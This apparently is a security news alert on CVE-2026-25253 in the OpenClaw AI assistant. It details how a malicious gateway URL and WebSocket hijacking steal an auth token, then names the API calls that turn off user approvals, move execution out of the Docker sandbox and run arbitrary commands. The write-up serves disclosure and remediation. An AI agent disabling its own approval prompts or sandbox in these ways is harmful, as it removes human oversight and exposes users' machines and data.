Alerts

Critical 1-Click RCE in OpenClaw Gives Attackers Full Control of Developer Machines (CVE-2026-25253)

Zero Day Wire

2 min read
Critical 1-Click RCE in OpenClaw Gives Attackers Full Control of Developer Machines (CVE-2026-25253)

A critical vulnerability in OpenClaw — the viral open-source AI assistant trusted by over 100,000 developers — allows attackers to achieve full remote code execution on a victim's machine through a single webpage visit. No user interaction beyond loading the page is required.

CVE-2026-25253 (CVSS 8.8) affects all OpenClaw versions through v2026.1.28. The flaw chains a logic bug in how the Control UI handles gateway URLs with a WebSocket origin validation failure to exfiltrate authentication tokens, disable safety guardrails, and execute arbitrary commands on the host machine — all within milliseconds.

The vulnerability was independently discovered by security researchers at depthfirst General Security Intelligence and reported to OpenClaw creator Peter Steinberger, who patched it in v2026.1.29.

Why OpenClaw Is a High-Value Target

OpenClaw (formerly MoltBot and ClawdBot) runs locally with persistent memory and deep system integration — iMessage, WhatsApp, Slack access, file system control, and shell execution. Users grant it broad permissions by design. A compromised OpenClaw instance gives an attacker everything the assistant has access to, which for most users is effectively their entire digital life.

The Exploit Chain

The attack chains three components that are individually benign but collectively devastating:

Step 1 — Gateway URL Injection. The Control UI's app-settings.ts accepts a gatewayUrl query parameter from the URL and persists it to storage without any validation. Visiting https://localhost?gatewayUrl=attacker.com silently overwrites the gateway configuration.

Step 2 — Auto-Connect with Token. On page load, app-lifecycle.ts immediately triggers connectGateway(), which bundles the security-sensitive authToken into the WebSocket handshake to whatever gateway URL is configured — including the attacker's server.

Step 3 — WebSocket Origin Bypass. Most users run OpenClaw on localhost, which should be unreachable from external sites. However, OpenClaw's WebSocket server fails to validate the origin header, accepting connections from any site. This enables Cross-Site WebSocket Hijacking (CSWSH) — the victim's browser acts as a bridge between the attacker's site and the victim's localhost.

From Token Theft to Full RCE

With the stolen authentication token (which carries operator.admin and operator.approvals scopes), the attacker doesn't need to find a sandbox escape. They simply use the API to disable safety features:

Disable user confirmation — An exec.approvals.set request sets ask: "off", removing all prompts before dangerous commands execute.

Escape containers — A config.patch request sets tools.exec.host to "gateway", forcing commands to run directly on the host machine instead of inside Docker.

Execute arbitrary commands — A node.invoke request with system.run executes whatever the attacker wants on the victim's machine.

The entire chain executes in milliseconds after the victim loads a webpage. No clicks, no approvals, no visible indicators.

Remediation

  • Update to OpenClaw v2026.1.29 or later immediately — the patch adds a gateway URL confirmation modal, eliminating the auto-connect behavior
  • Rotate all gateway tokens if you suspect any may have been exposed
  • Audit connected sessions for any unauthorized gateway connections
  • Review exec-approvals.json to ensure safety defaults haven't been tampered with

This vulnerability compounds the platform's existing security challenges — Koi Security recently identified over 340 malicious skill packages on ClawHub, OpenClaw's official registry, distributing NovaStealer malware targeting cryptocurrency wallets and credentials.

MITRE ATT&CK

T1189 — Drive-by Compromise Single webpage visit triggers full exploit chain

T1528 — Steal Application Access Token Authentication token exfiltrated via malicious gateway URL

T1059.007 — Command and Scripting Interpreter: JavaScript Client-side JavaScript executes WebSocket hijacking and API calls

T1059.004 — Command and Scripting Interpreter: Unix Shell Arbitrary shell commands executed on host via node.invoke

T1562.001 — Impair Defenses: Disable or Modify Tools Safety guardrails and sandbox configuration disabled via API

Read more

ClickFix Campaign Compromises Legitimate Sites to Deploy MIMICRAT — A Custom C++ RAT With 22 Post-Exploitation Commands

ClickFix Campaign Compromises Legitimate Sites to Deploy MIMICRAT — A Custom C++ RAT With 22 Post-Exploitation Commands

Elastic Security Labs has disclosed a new ClickFix campaign that leverages compromised legitimate websites as delivery infrastructure to deploy a previously undocumented remote access trojan dubbed MIMICRAT (also tracked as AstarionRAT). The campaign, discovered earlier this month, demonstrates significant operational sophistication — from multi-stage PowerShell chains that bypass Windows security controls

By Zero Day Wire
ShinyHunters Linked to Device Code Vishing Attacks Targeting Microsoft Entra Accounts via OAuth 2.0 Abuse

ShinyHunters Linked to Device Code Vishing Attacks Targeting Microsoft Entra Accounts via OAuth 2.0 Abuse

A new wave of attacks is combining voice phishing (vishing) with OAuth 2.0 device authorization abuse to compromise Microsoft Entra accounts at technology, manufacturing, and financial organizations — bypassing traditional phishing infrastructure entirely. Sources told BleepingComputer they believe the ShinyHunters extortion gang is behind the campaigns, which the threat actors

By Zero Day Wire